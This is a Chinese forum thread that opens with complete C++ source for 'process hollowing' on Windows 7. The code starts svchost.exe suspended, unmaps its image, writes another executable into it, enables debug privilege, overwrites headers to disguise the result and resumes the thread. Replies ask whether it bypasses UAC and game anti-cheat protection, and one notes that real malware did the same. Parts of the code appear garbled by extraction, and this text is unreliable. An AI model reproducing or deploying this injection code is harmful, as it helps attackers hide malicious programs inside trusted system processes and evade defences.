win7下exe整体注入
将当前目录下的test3.exe注入到 svchost.exe进程并成功运行//VC-Win32
#define _WIN32_WINNT 0x0501
#define WIN32_LEAN_AND_MEAN
#pragma comment(lib,"ntdll.lib")
#include <vector>//sprintf
#include <stdio.h>//garbage 1
#include <windows.h> //garbage 2
#include <ntstatus.h> //return codes
#include <ntsecapi.h> //NTSTATUS
#define TARGETS_0"svchost.exe\0"
extern "C"
{
PIMAGE_NT_HEADERS __stdcall RtlImageNtHeader( IN PVOID ModuleAddress );
NTSTATUS __stdcall NtGetContextThread( IN HANDLE ThreadHandle, OUT PCONTEXT pContext );
NTSTATUS __stdcall NtReadVirtualMemory( IN HANDLE ProcessHandle, IN PVOID BaseAddress, OUT PVOID Buffer, IN ULONG NumberOfBytesToRead, OUT PULONG NumberOfBytesReaded OPTIONAL );
NTSTATUS __stdcall NtWriteVirtualMemory( IN HANDLE ProcessHandle, IN PVOID BaseAddress, IN PVOID Buffer, IN ULONG NumberOfBytesToWrite, OUT PULONG NumberOfBytesWritten OPTIONAL );
NTSTATUS __stdcall NtProtectVirtualMemory( IN HANDLE ProcessHandle, IN OUT PVOID *BaseAddress, IN OUT PULONG NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection );
NTSTATUS __stdcall NtSetContextThread( IN HANDLE ThreadHandle, IN PCONTEXT Context );
NTSTATUS __stdcall NtResumeThread( IN HANDLE ThreadHandle, OUT PULONG SuspendCount OPTIONAL );
NTSTATUS __stdcall ZwUnmapViewOfSection( IN HANDLEProcessHandle, IN PVOIDBaseAddress );
};
char target;
void__stdcall set_target(void)
{
srand(GetCurrentProcessId());
switch( 0 )
{
default:
case 0:sprintf(target,TARGETS_0);break;
}
}
void__stdcall GainPrivileges(void)
{
HANDLE hToken;
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);
LUID luid;
LookupPrivilegeValueA(NULL,"SeDebugPrivilege",&luid);
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;
tp.Privileges.Luid= luid;
tp.Privileges.Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(TOKEN_PRIVILEGES),FALSE,FALSE);
CloseHandle(hToken);
}
void__stdcall fork_system_file(void* file)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
SECURITY_ATTRIBUTES st;
SECURITY_ATTRIBUTES sp;
memset(&si,0,sizeof(STARTUPINFO));
memset(&pi,0,sizeof(PROCESS_INFORMATION));
memset(&st,0,sizeof(SECURITY_ATTRIBUTES));
memset(&sp,0,sizeof(SECURITY_ATTRIBUTES));
si.cb = sizeof(STARTUPINFO);
set_target();
GainPrivileges();
//create our target
CreateProcessA(
0,
target,
&st,
&sp,
1,
CREATE_SUSPENDED,
0,
0,
&si,
&pi
);
//get usefull
HANDLE _hProcess = pi.hProcess;
HANDLE _hThread= pi.hThread;
CONTEXT context= {CONTEXT_FULL};
NtGetContextThread(_hThread, &context);
PVOID x;
NtReadVirtualMemory(_hProcess,PCHAR(context.Eax), &x, sizeof(x), 0);
ZwUnmapViewOfSection(_hProcess,x);
//get pe of the ressource
PIMAGE_DOS_HEADER mz;
*(void**)&mz = reinterpret_cast<PIMAGE_DOS_HEADER>(file);
if(!mz) FatalAppExitA(0,"! IMAGE_NT_HEADERS");
PIMAGE_NT_HEADERS pe;
*(void**)&pe = RtlImageNtHeader(file);
if(!pe) FatalAppExitA(0,"! IMAGE_NT_HEADERS");
//alloc it
void* newbase;
newbase = VirtualAllocEx(
_hProcess,
PVOID(pe->OptionalHeader.ImageBase),
pe->OptionalHeader.SizeOfImage,
MEM_RESERVE|MEM_COMMIT,
PAGE_READWRITE
);
NtWriteVirtualMemory(
_hProcess,
newbase,
file,
pe->OptionalHeader.SizeOfHeaders,
0
);
PIMAGE_SECTION_HEADER sect = IMAGE_FIRST_SECTION(pe);
for ( unsigned long i = 0; i < pe->FileHeader.NumberOfSections; i++ )
{
//edit all
unsigned long oldprot;
NtWriteVirtualMemory(
_hProcess,
PCHAR(newbase) + sect.VirtualAddress,
PCHAR(file) + sect.PointerToRawData,
sect.SizeOfRawData,
0
);
NtProtectVirtualMemory(
_hProcess,
(void**)PCHAR(newbase) + sect.VirtualAddress,
§.Misc.VirtualSize,
PAGE_EXECUTE_READWRITE,
&oldprot
);
}
DWORDwrote;
DWORD* pebInfo = (DWORD*)context.Ebx;
NtWriteVirtualMemory(_hProcess,&pebInfo,&newbase,sizeof(DWORD),&wrote);
unsigned long entrypoint;
entrypoint = ULONG(newbase) + pe->OptionalHeader.AddressOfEntryPoint;
context.Eax = context.Eip = entrypoint;
context.SegGs= 0;
context.SegFs= 0x38;
context.SegEs= 0x20;
context.SegDs= 0x20;
context.SegSs= 0x20;
context.SegCs= 0x18;
context.EFlags = 0x3000;
//spoof some stuff
NtWriteVirtualMemory(_hProcess,&entrypoint,new BYTE,sizeof(DWORD),0);
NtWriteVirtualMemory(_hProcess,mz,new BYTE,sizeof(PIMAGE_DOS_HEADER),0);
NtWriteVirtualMemory(_hProcess,pe,new BYTE,sizeof(PIMAGE_NT_HEADERS),0);
//resume process
NtSetContextThread(_hThread,&context);
NtResumeThread(_hThread,0);
}
int WINAPI WinMain(HINSTANCE hinst, HINSTANCE hinstPrev, LPSTR lpszCmdLine, int nCmdShow)
{
HANDLE hFile = NULL;
hFile = ::CreateFile( "test3.exe"
, GENERIC_READ
, 0
, NULL
, OPEN_EXISTING
, FILE_ATTRIBUTE_NORMAL
, NULL
);
if( hFile == INVALID_HANDLE_VALUE )
{
MessageBox(0,"找不到文件","ff",0);
return -1;
}
::SetFilePointer( hFile, 0, NULL, FILE_BEGIN);
DWORD dwFileSize = ::GetFileSize( hFile, NULL);
LPBYTE pBuf = new BYTE;
memset( pBuf, 0, dwFileSize);
DWORD dwNumberOfBytesRead = 0;
::ReadFile( hFile
, pBuf
, dwFileSize
, &dwNumberOfBytesRead
, NULL
);
::CloseHandle(hFile);
fork_system_file(pBuf );
return 0;
} 楼主好人,请给出完整的头文件代码,或者麻烦你打个包。 我的代码用VC直接编译即可,就一个文件,编译即可成功 拿去试试。。。只支持win7吗? 本帖最后由 乔丹二世 于 2010-5-25 00:18 编辑
我的VC2008无法使用。。。
不是代码错误,是连接错误。。。 忽忽,,掏空进程 能过UAC吗? 前段时间公司的机器中过类似的病毒,汗。
也是把svchost.exe弄空了然后写了自己的内容进去,DUMP后才发现。。。 同问,能过UAC 么 本帖最后由 Murray 于 2011-5-13 19:09 编辑
自己掏空的 svchost.exe 能过掉 各种游戏保护的白名单吗?,或者说- -这个 demo可以直接OpenProcess和WriteProcessMemory 被保护的进程么
刚才试了下- -悲催了。还是被TP屏蔽了。想不通了。难道svchost.exe不在白名单里? 支持源码 支持分享
页:
[1]